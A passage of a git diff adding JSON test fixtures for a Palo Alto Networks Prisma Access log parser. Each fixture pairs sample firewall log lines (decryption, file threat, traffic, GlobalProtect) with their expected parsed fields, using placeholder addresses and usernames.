+    "related": {
+      "hosts": [
+        "xxxxx"
+      ],
+      "user": [
+        "xxxxx"
+      ]
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/decryption_cef.json b/Palo Alto Networks/paloalto-prima-access/tests/decryption_cef.json
new file mode 100644
index 000000000..1a4fba4b4
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/decryption_cef.json	
@@ -0,0 +1,97 @@
+{
+  "input": {
+    "message": "CEF:0|Palo Alto Networks|LF|2.0|DECRYPTION|end|3|ProfileToken=xxxxx dtz=UTC rt=Mar 01 2021 20:35:54 PanOSDeviceSN=xxxxxxxxxxxxx PanOSConfigVersion=null start=Mar 01 2021 20:35:54 src=1.1.1.1 dst=1.1.1.1 sourceTranslatedAddress=1.1.1.1 destinationTranslatedAddress=1.1.1.1 cs1=allow-all-employees cs1Label=Rule suser=paloaltonetwork\\\\\\\\xxxxx duser=paloaltonetwork\\\\\\\\xxxxx app=gmail-base cs3=vsys1 cs3Label=VirtualLocation cs4=datacenter cs4Label=FromZone cs5=ethernet4Zone-test1 cs5Label=ToZone deviceInboundInterface=ethernet1/1 deviceOutboundInterface=tunnel.901 cs6=test cs6Label=LogSetting PanOSTimeReceivedManagementPlane=Dec 12 2019 22:16:48 cn1=106112 cn1Label=SessionID cnt=1 spt=16524 dpt=20122 sourceTranslatedPort=15856 destinationTranslatedPort=10128 proto=tcp act=deny PanOSTunnel=N/A PanOSSourceUUID= PanOSDestinationUUID= PanOSRuleUUID=fnullacnullnulle1-2c69-4f2b-8293-46ee4c73737e PanOSClientToFirewall=null PanOSFirewallToClient=null PanOSTLSVersion=null PanOSTLSKeyExchange=null PanOSTLSEncryptionAlgorithm=null PanOSTLSAuth=null PanOSPolicyName= PanOSEllipticCurve= PanOSErrorIndex=null PanOSRootStatus=null PanOSChainStatus=null PanOSProxyType=null PanOSCertificateSerial= PanOSFingerprint= PanOSTimeNotBefore=0 PanOSTimeNotAfter=0 PanOSCertificateVersion=null PanOSCertificateSize=0 PanOSCommonNameLength=0 PanOSIssuerNameLength=0 PanOSRootCNLength=0 PanOSSNILength=0 PanOSCertificateFlags=0 PanOSCommonName= PanOSIssuerCommonName= PanOSRootCommonName= PanOSServerNameIndication= PanOSErrorMessage= PanOSContainerID= PanOSContainerNameSpace= PanOSContainerName= PanOSSourceEDL= PanOSDestinationEDL= PanOSSourceDynamicAddressGroup= PanOSDestinationDynamicAddressGroup=test PanOSTimeGeneratedHighResolution=Jul 25 2019 23:30:12 PanOSSourceDeviceCategory= PanOSSourceDeviceProfile= PanOSSourceDeviceModel= PanOSSourceDeviceVendor= PanOSSourceDeviceOSFamily= PanOSSourceDeviceOSVersion= PanOSSourceDeviceHost= PanOSSourceDeviceMac= PanOSDestinationDeviceCategory= PanOSDestinationDeviceProfile= PanOSDestinationDeviceModel= PanOSDestinationDeviceVendor= PanOSDestinationDeviceOSFamily= PanOSDestinationDeviceOSVersion= PanOSDestinationDeviceHost= PanOSDestinationDeviceMac= externalId=xxxxxxxxxxxxx"
+  },
+  "expected": {
+    "message": "CEF:0|Palo Alto Networks|LF|2.0|DECRYPTION|end|3|ProfileToken=xxxxx dtz=UTC rt=Mar 01 2021 20:35:54 PanOSDeviceSN=xxxxxxxxxxxxx PanOSConfigVersion=null start=Mar 01 2021 20:35:54 src=1.1.1.1 dst=1.1.1.1 sourceTranslatedAddress=1.1.1.1 destinationTranslatedAddress=1.1.1.1 cs1=allow-all-employees cs1Label=Rule suser=paloaltonetwork\\\\\\\\xxxxx duser=paloaltonetwork\\\\\\\\xxxxx app=gmail-base cs3=vsys1 cs3Label=VirtualLocation cs4=datacenter cs4Label=FromZone cs5=ethernet4Zone-test1 cs5Label=ToZone deviceInboundInterface=ethernet1/1 deviceOutboundInterface=tunnel.901 cs6=test cs6Label=LogSetting PanOSTimeReceivedManagementPlane=Dec 12 2019 22:16:48 cn1=106112 cn1Label=SessionID cnt=1 spt=16524 dpt=20122 sourceTranslatedPort=15856 destinationTranslatedPort=10128 proto=tcp act=deny PanOSTunnel=N/A PanOSSourceUUID= PanOSDestinationUUID= PanOSRuleUUID=fnullacnullnulle1-2c69-4f2b-8293-46ee4c73737e PanOSClientToFirewall=null PanOSFirewallToClient=null PanOSTLSVersion=null PanOSTLSKeyExchange=null PanOSTLSEncryptionAlgorithm=null PanOSTLSAuth=null PanOSPolicyName= PanOSEllipticCurve= PanOSErrorIndex=null PanOSRootStatus=null PanOSChainStatus=null PanOSProxyType=null PanOSCertificateSerial= PanOSFingerprint= PanOSTimeNotBefore=0 PanOSTimeNotAfter=0 PanOSCertificateVersion=null PanOSCertificateSize=0 PanOSCommonNameLength=0 PanOSIssuerNameLength=0 PanOSRootCNLength=0 PanOSSNILength=0 PanOSCertificateFlags=0 PanOSCommonName= PanOSIssuerCommonName= PanOSRootCommonName= PanOSServerNameIndication= PanOSErrorMessage= PanOSContainerID= PanOSContainerNameSpace= PanOSContainerName= PanOSSourceEDL= PanOSDestinationEDL= PanOSSourceDynamicAddressGroup= PanOSDestinationDynamicAddressGroup=test PanOSTimeGeneratedHighResolution=Jul 25 2019 23:30:12 PanOSSourceDeviceCategory= PanOSSourceDeviceProfile= PanOSSourceDeviceModel= PanOSSourceDeviceVendor= PanOSSourceDeviceOSFamily= PanOSSourceDeviceOSVersion= PanOSSourceDeviceHost= PanOSSourceDeviceMac= PanOSDestinationDeviceCategory= PanOSDestinationDeviceProfile= PanOSDestinationDeviceModel= PanOSDestinationDeviceVendor= PanOSDestinationDeviceOSFamily= PanOSDestinationDeviceOSVersion= PanOSDestinationDeviceHost= PanOSDestinationDeviceMac= externalId=xxxxxxxxxxxxx",
+    "event": {
+      "action": "deny",
+      "category": [
+        "network"
+      ],
+      "dataset": "decryption",
+      "severity": 3,
+      "start": "2021-03-01T20:35:54Z",
+      "timezone": "UTC",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2021-03-01T20:35:54Z",
+    "action": {
+      "type": "end"
+    },
+    "destination": {
+      "address": "1.1.1.1",
+      "ip": "1.1.1.1",
+      "nat": {
+        "ip": "1.1.1.1",
+        "port": 10128
+      },
+      "port": 20122,
+      "user": {
+        "domain": "paloaltonetwork",
+        "name": "xxxxx"
+      }
+    },
+    "log": {
+      "logger": "decryption"
+    },
+    "network": {
+      "application": "gmail-base",
+      "transport": "tcp"
+    },
+    "observer": {
+      "egress": {
+        "interface": {
+          "alias": "ethernet4Zone-test1",
+          "id": "tunnel.901",
+          "name": "tunnel.901"
+        }
+      },
+      "ingress": {
+        "interface": {
+          "alias": "datacenter",
+          "id": "tunnel.901",
+          "name": "1"
+        }
+      },
+      "product": "PAN-OS",
+      "type": "LF",
+      "vendor": "Palo Alto Networks",
+      "version": "2.0"
+    },
+    "paloalto": {
+      "VirtualLocation": "vsys1"
+    },
+    "related": {
+      "ip": [
+        "1.1.1.1"
+      ],
+      "user": [
+        "xxxxx"
+      ]
+    },
+    "rule": {
+      "name": "allow-all-employees",
+      "uuid": "fnullacnullnulle1-2c69-4f2b-8293-46ee4c73737e"
+    },
+    "source": {
+      "address": "1.1.1.1",
+      "ip": "1.1.1.1",
+      "nat": {
+        "ip": "1.1.1.1",
+        "port": 15856
+      },
+      "port": 16524,
+      "user": {
+        "domain": "paloaltonetwork",
+        "name": "xxxxx"
+      }
+    },
+    "user": {
+      "domain": "paloaltonetwork",
+      "name": "xxxxx"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/file_cef.json b/Palo Alto Networks/paloalto-prima-access/tests/file_cef.json
new file mode 100644
index 000000000..2da36f33e
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/file_cef.json	
@@ -0,0 +1,97 @@
+{
+  "input": {
+    "message": "CEF:0|Palo Alto Networks|LF|2.0|THREAT|file|3|ProfileToken=xxxxx dtz=UTC rt=Mar 01 2021 21:06:06 deviceExternalId=xxxxxxxxxxxxx PanOSConfigVersion= PanOSApplicationCategory=collaboration PanOSApplicationContainer= PanOSApplicationRisk=5 PanOSApplicationSubcategory=email PanOSApplicationTechnology=client-server PanOSCaptivePortal=false PanOSCloudHostname=PA-5220 PanOSCortexDataLakeTenantID=xxxxxxxxxxxxx PanOSDLPVersionFlag= PanOSDestinationDeviceClass= PanOSDestinationDeviceOS= dntdom= duser= duid= PanOSFileType=PNG File Upload PanOSInboundInterfaceDetailsPort=19 PanOSInboundInterfaceDetailsSlot=1 PanOSInboundInterfaceDetailsType=ethernet PanOSInboundInterfaceDetailsUnit=0 PanOSIsClienttoServer=false PanOSIsContainer=false PanOSIsDecryptMirror=false PanOSIsDecrypted= PanOSIsDuplicateLog=false PanOSIsEncrypted= PanOSIsIPV6= PanOSIsMptcpOn=false PanOSIsNonStandardDestinationPort=false PanOSIsPacketCapture=false PanOSIsPhishing=false PanOSIsPrismaNetwork=false PanOSIsPrismaUsers=false PanOSIsProxy=false PanOSIsReconExcluded=false PanOSIsSaaSApplication=false PanOSIsServertoClient=false PanOSIsSourceXForwarded= PanOSIsSystemReturn=false PanOSIsTransaction=false PanOSIsTunnelInspected=false PanOSIsURLDenied=false PanOSLogExported=false PanOSLogForwarded=true PanOSLogSource=firewall PanOSLogSourceTimeZoneOffset= PanOSNAT=false PanOSNonStandardDestinationPort=0 PanOSOutboundInterfaceDetailsPort=19 PanOSOutboundInterfaceDetailsSlot=1 PanOSOutboundInterfaceDetailsType=ethernet PanOSOutboundInterfaceDetailsUnit=0 PanOSPacket= PanOSProfileName= PanOSSanctionedStateOfApp=false PanOSSeverity=Low PanOSSourceDeviceClass= PanOSSourceDeviceOS= sntdom= suser= suid= PanOSThreatCategory= PanOSThreatNameFirewall= PanOSTunneledApplication=untunneled PanOSURL= PanOSUsers=1.1.1.1 PanOSVirtualSystemID=1 start=Mar 01 2021 21:06:06 src=1.1.1.1 dst=1.1.1.1 sourceTranslatedAddress=1.1.1.1 destinationTranslatedAddress=1.1.1.1 cs1=dg-log-policy cs1Label=Rule suser0= duser0= app=smtp cs3=smtp cs3Label=VirtualLocation cs4=tap cs4Label=FromZone cs5=tap cs5Label=ToZone deviceInboundInterface=ethernet1/19 deviceOutboundInterface=ethernet1/19 cs6=test cs6Label=LogSetting cn1=4016143 cn1Label=SessionID cnt=9 spt=37404 dpt=25 sourceTranslatedPort=0 destinationTranslatedPort=0 proto=tcp act=alert filePath=page-icon.png cs2=any cs2Label=URLCategory flexString2=client to server flexString2Label=DirectionOfAttack externalId=xxxxxxxxxxxxx PanOSSourceLocation=1.1.1.1-1.1.1.1 PanOSDestinationLocation=1.1.1.1-1.1.1.1 fileId=0 PanOSFileHash= PanOSReportID= PanOSDGHierarchyLevel1=12 PanOSDGHierarchyLevel2=0 PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= dvchost=PA-5220 PanOSSourceUUID= PanOSDestinationUUID= PanOSIMSI=0 PanOSIMEI= PanOSParentSessionID=0 PanOSParentStartTime=Jan 01 1970 00:00:00 PanOSTunnel=N/A PanOSContentVersion= PanOSSigFlags=0 PanOSRuleUUID= PanOSHTTP2Connection= PanOSDynamicUserGroup= PanOSX-Forwarded-ForIP= PanOSSourceDeviceCategory= PanOSSourceDeviceProfile= PanOSSourceDeviceModel= PanOSSourceDeviceVendor= PanOSSourceDeviceOSFamily= PanOSSourceDeviceOSVersion= PanOSSourceDeviceHost= PanOSSourceDeviceMac= PanOSDestinationDeviceCategory= PanOSDestinationDeviceProfile= PanOSDestinationDeviceModel= PanOSDestinationDeviceVendor= PanOSDestinationDeviceOSFamily= PanOSDestinationDeviceOSVersion= PanOSDestinationDeviceHost= PanOSDestinationDeviceMac= PanOSContainerID= PanOSContainerNameSpace= PanOSContainerName= PanOSSourceEDL= PanOSDestinationEDL= PanOSHostID=xxxxxxxxxxxxxx PanOSEndpointSerialNumber=xxxxxxxxxxxxxx PanOSDomainEDL= PanOSSourceDynamicAddressGroup= PanOSDestinationDynamicAddressGroup= PanOSPartialHash= PanOSTimeGeneratedHighResolution=Jul 25 2019 23:30:12 PanOSReasonForDataFilteringAction= PanOSJustification= PanOSNSSAINetworkSliceType="
+  },
+  "expected": {
+    "message": "CEF:0|Palo Alto Networks|LF|2.0|THREAT|file|3|ProfileToken=xxxxx dtz=UTC rt=Mar 01 2021 21:06:06 deviceExternalId=xxxxxxxxxxxxx PanOSConfigVersion= PanOSApplicationCategory=collaboration PanOSApplicationContainer= PanOSApplicationRisk=5 PanOSApplicationSubcategory=email PanOSApplicationTechnology=client-server PanOSCaptivePortal=false PanOSCloudHostname=PA-5220 PanOSCortexDataLakeTenantID=xxxxxxxxxxxxx PanOSDLPVersionFlag= PanOSDestinationDeviceClass= PanOSDestinationDeviceOS= dntdom= duser= duid= PanOSFileType=PNG File Upload PanOSInboundInterfaceDetailsPort=19 PanOSInboundInterfaceDetailsSlot=1 PanOSInboundInterfaceDetailsType=ethernet PanOSInboundInterfaceDetailsUnit=0 PanOSIsClienttoServer=false PanOSIsContainer=false PanOSIsDecryptMirror=false PanOSIsDecrypted= PanOSIsDuplicateLog=false PanOSIsEncrypted= PanOSIsIPV6= PanOSIsMptcpOn=false PanOSIsNonStandardDestinationPort=false PanOSIsPacketCapture=false PanOSIsPhishing=false PanOSIsPrismaNetwork=false PanOSIsPrismaUsers=false PanOSIsProxy=false PanOSIsReconExcluded=false PanOSIsSaaSApplication=false PanOSIsServertoClient=false PanOSIsSourceXForwarded= PanOSIsSystemReturn=false PanOSIsTransaction=false PanOSIsTunnelInspected=false PanOSIsURLDenied=false PanOSLogExported=false PanOSLogForwarded=true PanOSLogSource=firewall PanOSLogSourceTimeZoneOffset= PanOSNAT=false PanOSNonStandardDestinationPort=0 PanOSOutboundInterfaceDetailsPort=19 PanOSOutboundInterfaceDetailsSlot=1 PanOSOutboundInterfaceDetailsType=ethernet PanOSOutboundInterfaceDetailsUnit=0 PanOSPacket= PanOSProfileName= PanOSSanctionedStateOfApp=false PanOSSeverity=Low PanOSSourceDeviceClass= PanOSSourceDeviceOS= sntdom= suser= suid= PanOSThreatCategory= PanOSThreatNameFirewall= PanOSTunneledApplication=untunneled PanOSURL= PanOSUsers=1.1.1.1 PanOSVirtualSystemID=1 start=Mar 01 2021 21:06:06 src=1.1.1.1 dst=1.1.1.1 sourceTranslatedAddress=1.1.1.1 destinationTranslatedAddress=1.1.1.1 cs1=dg-log-policy cs1Label=Rule suser0= duser0= app=smtp cs3=smtp cs3Label=VirtualLocation cs4=tap cs4Label=FromZone cs5=tap cs5Label=ToZone deviceInboundInterface=ethernet1/19 deviceOutboundInterface=ethernet1/19 cs6=test cs6Label=LogSetting cn1=4016143 cn1Label=SessionID cnt=9 spt=37404 dpt=25 sourceTranslatedPort=0 destinationTranslatedPort=0 proto=tcp act=alert filePath=page-icon.png cs2=any cs2Label=URLCategory flexString2=client to server flexString2Label=DirectionOfAttack externalId=xxxxxxxxxxxxx PanOSSourceLocation=1.1.1.1-1.1.1.1 PanOSDestinationLocation=1.1.1.1-1.1.1.1 fileId=0 PanOSFileHash= PanOSReportID= PanOSDGHierarchyLevel1=12 PanOSDGHierarchyLevel2=0 PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= dvchost=PA-5220 PanOSSourceUUID= PanOSDestinationUUID= PanOSIMSI=0 PanOSIMEI= PanOSParentSessionID=0 PanOSParentStartTime=Jan 01 1970 00:00:00 PanOSTunnel=N/A PanOSContentVersion= PanOSSigFlags=0 PanOSRuleUUID= PanOSHTTP2Connection= PanOSDynamicUserGroup= PanOSX-Forwarded-ForIP= PanOSSourceDeviceCategory= PanOSSourceDeviceProfile= PanOSSourceDeviceModel= PanOSSourceDeviceVendor= PanOSSourceDeviceOSFamily= PanOSSourceDeviceOSVersion= PanOSSourceDeviceHost= PanOSSourceDeviceMac= PanOSDestinationDeviceCategory= PanOSDestinationDeviceProfile= PanOSDestinationDeviceModel= PanOSDestinationDeviceVendor= PanOSDestinationDeviceOSFamily= PanOSDestinationDeviceOSVersion= PanOSDestinationDeviceHost= PanOSDestinationDeviceMac= PanOSContainerID= PanOSContainerNameSpace= PanOSContainerName= PanOSSourceEDL= PanOSDestinationEDL= PanOSHostID=xxxxxxxxxxxxxx PanOSEndpointSerialNumber=xxxxxxxxxxxxxx PanOSDomainEDL= PanOSSourceDynamicAddressGroup= PanOSDestinationDynamicAddressGroup= PanOSPartialHash= PanOSTimeGeneratedHighResolution=Jul 25 2019 23:30:12 PanOSReasonForDataFilteringAction= PanOSJustification= PanOSNSSAINetworkSliceType=",
+    "event": {
+      "action": "alert",
+      "category": [
+        "file"
+      ],
+      "dataset": "threat",
+      "severity": 3,
+      "start": "2021-03-01T21:06:06Z",
+      "timezone": "UTC",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2021-03-01T21:06:06Z",
+    "action": {
+      "type": "file"
+    },
+    "destination": {
+      "address": "1.1.1.1",
+      "ip": "1.1.1.1",
+      "nat": {
+        "ip": "1.1.1.1",
+        "port": 0
+      },
+      "port": 25
+    },
+    "host": {
+      "hostname": "PA-5220",
+      "id": "xxxxxxxxxxxxx",
+      "name": "PA-5220"
+    },
+    "log": {
+      "hostname": "PA-5220",
+      "logger": "threat"
+    },
+    "network": {
+      "application": "smtp",
+      "transport": "tcp"
+    },
+    "observer": {
+      "egress": {
+        "interface": {
+          "alias": "tap",
+          "id": "19",
+          "name": "ethernet1/19"
+        }
+      },
+      "ingress": {
+        "interface": {
+          "alias": "tap",
+          "id": "19",
+          "name": "9"
+        }
+      },
+      "product": "PAN-OS",
+      "type": "LF",
+      "vendor": "Palo Alto Networks",
+      "version": "2.0"
+    },
+    "paloalto": {
+      "DirectionOfAttack": "client to server",
+      "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx",
+      "PanOSSourceLocation": "1.1.1.1-1.1.1.1",
+      "URLCategory": "any",
+      "VirtualLocation": "smtp",
+      "endpoint": {
+        "serial_number": "xxxxxxxxxxxxxx"
+      }
+    },
+    "related": {
+      "hosts": [
+        "PA-5220"
+      ],
+      "ip": [
+        "1.1.1.1"
+      ]
+    },
+    "rule": {
+      "name": "dg-log-policy"
+    },
+    "source": {
+      "address": "1.1.1.1",
+      "ip": "1.1.1.1",
+      "nat": {
+        "ip": "1.1.1.1",
+        "port": 0
+      },
+      "port": 37404
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/fix_bug_with_int.json b/Palo Alto Networks/paloalto-prima-access/tests/fix_bug_with_int.json
new file mode 100644
index 000000000..512ae89e7
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/fix_bug_with_int.json	
@@ -0,0 +1,93 @@
+{
+  "input": {
+    "message": "1,2023/06/16 10:41:44,001701003551,TRAFFIC,end,2305,2023/06/16 10:41:44,1.2.3.4,5.6.7.8,0.0.0.0,0.0.0.0,GEN_WINLOG_Users,domain\\pusername,userdest,windows-remote-management,vsys1,PDT_STD,INFRA_ADM,aaa.111,aaa.111,Syslog_Test,2023/06/16 10:41:44,234981,1,51413,5985,0,0,15,tcp,allow,2346,1974,372,9,90,16,30,0,69678105127,0x0,10.0.0.0-10.255.255.255,10.0.0.0-10.255.255.255,0,6,3,tcp-fin,0,0,0,0,,FWPA01,from-policy,,,0,,0,,N/A,0,0,0,0,5e7eca5b-f585-4633-bbd4-9ed431f7f95b,0,0,,,,,,,"
+  },
+  "expected": {
+    "message": "1,2023/06/16 10:41:44,001701003551,TRAFFIC,end,2305,2023/06/16 10:41:44,1.2.3.4,5.6.7.8,0.0.0.0,0.0.0.0,GEN_WINLOG_Users,domain\\pusername,userdest,windows-remote-management,vsys1,PDT_STD,INFRA_ADM,aaa.111,aaa.111,Syslog_Test,2023/06/16 10:41:44,234981,1,51413,5985,0,0,15,tcp,allow,2346,1974,372,9,90,16,30,0,69678105127,0x0,10.0.0.0-10.255.255.255,10.0.0.0-10.255.255.255,0,6,3,tcp-fin,0,0,0,0,,FWPA01,from-policy,,,0,,0,,N/A,0,0,0,0,5e7eca5b-f585-4633-bbd4-9ed431f7f95b,0,0,,,,,,,",
+    "event": {
+      "action": "allow",
+      "category": [
+        "network"
+      ],
+      "dataset": "traffic",
+      "duration": 16,
+      "outcome": "success",
+      "type": [
+        "end"
+      ]
+    },
+    "@timestamp": "2023-06-16T10:41:44Z",
+    "action": {
+      "name": "allow",
+      "outcome": "success",
+      "type": "end"
+    },
+    "destination": {
+      "address": "5.6.7.8",
+      "bytes": 372,
+      "ip": "5.6.7.8",
+      "nat": {
+        "ip": "0.0.0.0",
+        "port": 0
+      },
+      "packets": 3,
+      "port": 5985,
+      "user": {
+        "name": "userdest"
+      }
+    },
+    "log": {
+      "hostname": "FWPA01",
+      "logger": "traffic"
+    },
+    "network": {
+      "application": "windows-remote-management",
+      "bytes": 2346,
+      "packets": 9,
+      "transport": "tcp"
+    },
+    "observer": {
+      "name": "FWPA01",
+      "product": "PAN-OS",
+      "serial_number": "001701003551"
+    },
+    "paloalto": {
+      "Threat_ContentType": "end",
+      "VirtualLocation": "vsys1"
+    },
+    "related": {
+      "ip": [
+        "0.0.0.0",
+        "1.2.3.4",
+        "5.6.7.8"
+      ],
+      "user": [
+        "pusername",
+        "userdest"
+      ]
+    },
+    "rule": {
+      "name": "GEN_WINLOG_Users",
+      "uuid": "5e7eca5b-f585-4633-bbd4-9ed431f7f95b"
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "bytes": 1974,
+      "ip": "1.2.3.4",
+      "nat": {
+        "ip": "0.0.0.0",
+        "port": 0
+      },
+      "packets": 6,
+      "port": 51413,
+      "user": {
+        "domain": "domain",
+        "name": "pusername"
+      }
+    },
+    "user": {
+      "domain": "domain",
+      "name": "pusername"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/fix_bug_without_int.json b/Palo Alto Networks/paloalto-prima-access/tests/fix_bug_without_int.json
new file mode 100644
index 000000000..add589697
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/fix_bug_without_int.json	
@@ -0,0 +1,91 @@
+{
+  "input": {
+    "message": "1,2023/06/16 10:41:44,001701003551,TRAFFIC,end,2305,2023/06/16 10:41:44,1.2.3.4,5.6.7.8,0.0.0.0,0.0.0.0,GEN_WINLOG_Users,domainusername,destuser,windows-remote-management,vsys1,PDT_STD,INFRA_ADM,aaa.111,aaa.111,Syslog_Test,2023/06/16 10:41:44,234981,1,51413,5985,0,0,0x1c,tcp,allow,2346,1974,372,9,2023/06/16 10:41:26,16,not-resolved,0,69678105127,0x0,10.0.0.0-10.255.255.255,10.0.0.0-10.255.255.255,0,6,3,tcp-fin,0,0,0,0,,FWPA01,from-policy,,,0,,0,,N/A,0,0,0,0,5e7eca5b-f585-4633-bbd4-9ed431f7f95b,0,0,,,,,,,"
+  },
+  "expected": {
+    "message": "1,2023/06/16 10:41:44,001701003551,TRAFFIC,end,2305,2023/06/16 10:41:44,1.2.3.4,5.6.7.8,0.0.0.0,0.0.0.0,GEN_WINLOG_Users,domainusername,destuser,windows-remote-management,vsys1,PDT_STD,INFRA_ADM,aaa.111,aaa.111,Syslog_Test,2023/06/16 10:41:44,234981,1,51413,5985,0,0,0x1c,tcp,allow,2346,1974,372,9,2023/06/16 10:41:26,16,not-resolved,0,69678105127,0x0,10.0.0.0-10.255.255.255,10.0.0.0-10.255.255.255,0,6,3,tcp-fin,0,0,0,0,,FWPA01,from-policy,,,0,,0,,N/A,0,0,0,0,5e7eca5b-f585-4633-bbd4-9ed431f7f95b,0,0,,,,,,,",
+    "event": {
+      "action": "allow",
+      "category": [
+        "network"
+      ],
+      "dataset": "traffic",
+      "duration": 16,
+      "outcome": "success",
+      "type": [
+        "end"
+      ]
+    },
+    "@timestamp": "2023-06-16T10:41:44Z",
+    "action": {
+      "name": "allow",
+      "outcome": "success",
+      "type": "end"
+    },
+    "destination": {
+      "address": "5.6.7.8",
+      "bytes": 372,
+      "ip": "5.6.7.8",
+      "nat": {
+        "ip": "0.0.0.0",
+        "port": 0
+      },
+      "packets": 3,
+      "port": 5985,
+      "user": {
+        "name": "destuser"
+      }
+    },
+    "log": {
+      "hostname": "FWPA01",
+      "logger": "traffic"
+    },
+    "network": {
+      "application": "windows-remote-management",
+      "bytes": 2346,
+      "packets": 9,
+      "transport": "tcp"
+    },
+    "observer": {
+      "name": "FWPA01",
+      "product": "PAN-OS",
+      "serial_number": "001701003551"
+    },
+    "paloalto": {
+      "Threat_ContentType": "end",
+      "VirtualLocation": "vsys1"
+    },
+    "related": {
+      "ip": [
+        "0.0.0.0",
+        "1.2.3.4",
+        "5.6.7.8"
+      ],
+      "user": [
+        "destuser",
+        "domainusername"
+      ]
+    },
+    "rule": {
+      "name": "GEN_WINLOG_Users",
+      "uuid": "5e7eca5b-f585-4633-bbd4-9ed431f7f95b"
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "bytes": 1974,
+      "ip": "1.2.3.4",
+      "nat": {
+        "ip": "0.0.0.0",
+        "port": 0
+      },
+      "packets": 6,
+      "port": 51413,
+      "user": {
+        "name": "domainusername"
+      }
+    },
+    "user": {
+      "name": "domainusername"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/globalprotect_cef.json b/Palo Alto Networks/paloalto-prima-access/tests/globalprotect_cef.json
new file mode 100644
index 000000000..4fd7b8802
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/globalprotect_cef.json	
@@ -0,0 +1,73 @@
+{
+  "input": {
+    "message": "CEF:0|Palo Alto Networks|LF|2.0|GLOBALPROTECT|globalprotect|3|ProfileToken=xxxxx dtz=UTC rt=Mar 01 2021 20:35:54 PanOSDeviceSN=xxxxxxxxxxxxx PanOSConfigVersion= start=Mar 01 2021 20:35:54 PanOSVirtualSystem=vsys1 PanOSEventIDValue=satellite-gateway-update-route PanOSStage=connected PanOSAuthMethod=RADIUS PanOSTunnelType=ipsec PanOSSourceUserName=xxxxx\\\\\\\\xxxxx PanOSSourceRegion=ET PanOSEndpointDeviceName=machine_name2 PanOSPublicIPv4=1.1.1.1 PanOSPublicIPv6=xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx PanOSPrivateIPv4=1.1.1.1 PanOSPrivateIPv6=xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx PanOSHostID=xxxxxxxxxxxxxxe667947f-d92e-4815-9222-89438203bc2b PanOSEndpointSN=serialno_list-1 PanOSGlobalProtectClientVersion=3.0.9 PanOSEndpointOSType=Intel Mac OS PanOSEndpointOSVersion=9.3.5 PanOSCountOfRepeats=16777216 PanOSQuarantineReason=Malicious Traffic PanOSConnectionError=Client cert not present PanOSDescription=opaque_list-1 PanOSEventStatus=failure PanOSGlobalProtectGatewayLocation=San Francisco PanOSLoginDuration=1 PanOSConnectionMethod=connect_method_list-1 PanOSConnectionErrorID=0 PanOSPortal=portal_list-2 PanOSSequenceNo=34401910 PanOSTimeGeneratedHighResolution=Jul 25 2019 23:30:12 PanOSGatewaySelectionType= PanOSSSLResponseTime= PanOSGatewayPriority= PanOSAttemptedGateways= PanOSGateway= PanOSDGHierarchyLevel1=20 PanOSDGHierarchyLevel2=0 PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= PanOSDeviceName=PA-VM PanOSVirtualSystemID=1"
+  },
+  "expected": {
+    "message": "CEF:0|Palo Alto Networks|LF|2.0|GLOBALPROTECT|globalprotect|3|ProfileToken=xxxxx dtz=UTC rt=Mar 01 2021 20:35:54 PanOSDeviceSN=xxxxxxxxxxxxx PanOSConfigVersion= start=Mar 01 2021 20:35:54 PanOSVirtualSystem=vsys1 PanOSEventIDValue=satellite-gateway-update-route PanOSStage=connected PanOSAuthMethod=RADIUS PanOSTunnelType=ipsec PanOSSourceUserName=xxxxx\\\\\\\\xxxxx PanOSSourceRegion=ET PanOSEndpointDeviceName=machine_name2 PanOSPublicIPv4=1.1.1.1 PanOSPublicIPv6=xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx PanOSPrivateIPv4=1.1.1.1 PanOSPrivateIPv6=xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx PanOSHostID=xxxxxxxxxxxxxxe667947f-d92e-4815-9222-89438203bc2b PanOSEndpointSN=serialno_list-1 PanOSGlobalProtectClientVersion=3.0.9 PanOSEndpointOSType=Intel Mac OS PanOSEndpointOSVersion=9.3.5 PanOSCountOfRepeats=16777216 PanOSQuarantineReason=Malicious Traffic PanOSConnectionError=Client cert not present PanOSDescription=opaque_list-1 PanOSEventStatus=failure PanOSGlobalProtectGatewayLocation=San Francisco PanOSLoginDuration=1 PanOSConnectionMethod=connect_method_list-1 PanOSConnectionErrorID=0 PanOSPortal=portal_list-2 PanOSSequenceNo=34401910 PanOSTimeGeneratedHighResolution=Jul 25 2019 23:30:12 PanOSGatewaySelectionType= PanOSSSLResponseTime= PanOSGatewayPriority= PanOSAttemptedGateways= PanOSGateway= PanOSDGHierarchyLevel1=20 PanOSDGHierarchyLevel2=0 PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= PanOSDeviceName=PA-VM PanOSVirtualSystemID=1",
+    "event": {
+      "category": [
+        "session"
+      ],
+      "dataset": "globalprotect",
+      "reason": "Client cert not present",
+      "severity": 3,
+      "start": "2021-03-01T20:35:54Z",
+      "timezone": "UTC",
+      "type": [
+        "start"
+      ]
+    },
+    "@timestamp": "2021-03-01T20:35:54Z",
+    "action": {
+      "name": "satellite-gateway-update-route",
